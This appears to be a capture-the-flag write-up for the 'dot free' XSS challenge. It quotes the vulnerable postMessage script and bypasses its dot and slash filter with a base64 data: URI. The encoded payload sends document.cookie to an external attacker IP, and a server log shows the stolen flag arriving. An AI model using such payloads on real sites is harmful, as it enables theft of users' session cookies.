vladvis/dotfree.md

## dotfree.md

      
    Raw
  

              dotfree.md
            
          
    dot free write-up


Firstly, we had try random url and got 404 with django's debug.
There was hint: "Using the URLconf defined in XSSWebSite.urls"
OK. This challenge is about XSS.
Then we noticed js on main page:

function lls(src) {
    var el = document.createElement('script');
    if (el) {
        el.setAttribute('type', 'text/javascript');
        el.src = src;
        document.body.appendChild(el);
    }
};

function lce(doc, def, parent) {
    var el = null;
    if (typeof doc.createElementNS != "undefined") el = doc.createElementNS("http://www.w3.org/1999/xhtml", def[0]);
    else if (typeof doc.createElement != "undefined") el = doc.createElement(def[0]);

    if (!el) return false;

    for (var i = 1; i
    < def.length; i++) el.setAttribute(def[i++], def[i]);
    if (parent) parent.appendChild(el);
    return el;
};
window.addEventListener('message', function (e) {
    if (e.data.iframe) {
        if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
            if (e.data.iframe.type == "iframe") {
                lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
            } else {
                lls(e.data.iframe.value)
            }
        }
    }
}, false);
window.onload = function (ev) {
    postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}


OK. We can build JSON which spawn script block:

{"iframe":{"value":"data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=","type":123}}


This payload spawns script block that leaks user's cookies:

<script type="text/javascript" src="data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU="></script>


We've submitted malformed url and got flag to our server:

13.57.104.34 - - [28/Jul/2018:14:25:27 +0200] "GET /xss.test?flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 502 "http://127.0.0.1/?%7B%22iframe%22:%7B%22value%22:%22data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=%22,%22type%22:123%7D%7D" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"